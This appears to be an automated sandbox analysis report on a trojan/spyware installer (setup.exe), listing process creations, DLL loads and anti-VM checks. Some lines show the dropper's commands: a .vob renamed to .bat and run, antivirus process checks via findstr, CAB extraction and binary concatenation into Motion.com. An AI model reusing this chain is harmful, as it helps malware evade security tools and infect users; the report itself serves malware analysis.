    Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00404451
    Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\826825\Motion.com (SHA256 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49)
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5672 -s 1912
    Source: setup.exe | Static PE information: invalid certificate
    Source: classification engine | Classification label: mal92.troj.spyw.evad.winEXE@27/27@3/2
    Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00403FDF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00403FDF
    Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00402218 CoCreateInstance,0_2_00402218
    Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5672
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
    Source: C:\Users\user\Desktop\setup.exe | File created: C:\Users\user\AppData\Local\Temp\nsaE03A.tmp
    Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat
    Source: setup.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Users\user\Desktop\setup.exe | File read: C:\Users\desktop.ini
    Source: C:\Users\user\Desktop\setup.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\setup.exe | File read: C:\Users\user\Desktop\setup.exe
    Source: unknown | Process created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
    Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 826825
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Mods.vob
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Previously" Mean
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 826825\Motion.com + Elephant + Diabetes + Severe + Tears + Slovakia + Laser + Vocal + Defend + Mixing 826825\Motion.com
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Fake.vob + ..\Shock.vob + ..\Examples.vob + ..\Why.vob + ..\Girl.vob + ..\Error.vob + ..\Protective.vob g
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\826825\Motion.com Motion.com g
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5672 -s 1912
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: acgenral.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: winmm.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: samcli.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: msacm32.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: version.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: dwmapi.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: urlmon.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: mpr.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: sspicli.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: winmmbase.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: winmmbase.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: iertutil.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: srvcli.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: netutils.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: shfolder.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: propsys.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: riched20.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: usp10.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: msls31.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: textinputframework.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: coreuicomponents.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: coremessaging.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: ntmarta.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: coremessaging.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: textshaping.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: edputil.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: appresolver.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: bcp47langs.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: slc.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: sppc.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\Desktop\setup.exe | Section loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
    Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
    Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: setup.exeStatic file information: File size 1259091 > 1048576
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00405B93 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405B93

    Persistence and Installation Behavior

    Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\826825\Motion.com
    Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\826825\Motion.com
    Source: C:\Users\user\Desktop\setup.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\setup.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\setup.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\setup.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\setup.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\setup.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\setup.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\setup.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\setup.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\setup.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\setup.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\setup.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | System information queried: FirmwareTableInformation
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com TID: 7888 | Thread sleep time: -60000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com TID: 7888 | Thread sleep time: -30000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
    Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00405B6C FindFirstFileW,FindClose,0_2_00405B6C
    Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_0040652D DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_0040652D
    Source: Amcache.hve.24.dr | Binary or memory string: VMware
    Source: Amcache.hve.24.dr | Binary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.24.dr | Binary or memory string: vmci.syshbin
    Source: Amcache.hve.24.dr | Binary or memory string: VMware, Inc.
    Source: Amcache.hve.24.dr | Binary or memory string: VMware20,1hbin@
    Source: Amcache.hve.24.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.24.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.24.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.24.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.24.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.24.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.24.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.24.dr | Binary or memory string: vmci.sys
    Source: Amcache.hve.24.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.24.dr | Binary or memory string: vmci.syshbin`
    Source: Amcache.hve.24.dr | Binary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.24.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.24.dr | Binary or memory string: VMware20,1
    Source: Amcache.hve.24.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.24.dr | Binary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.24.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
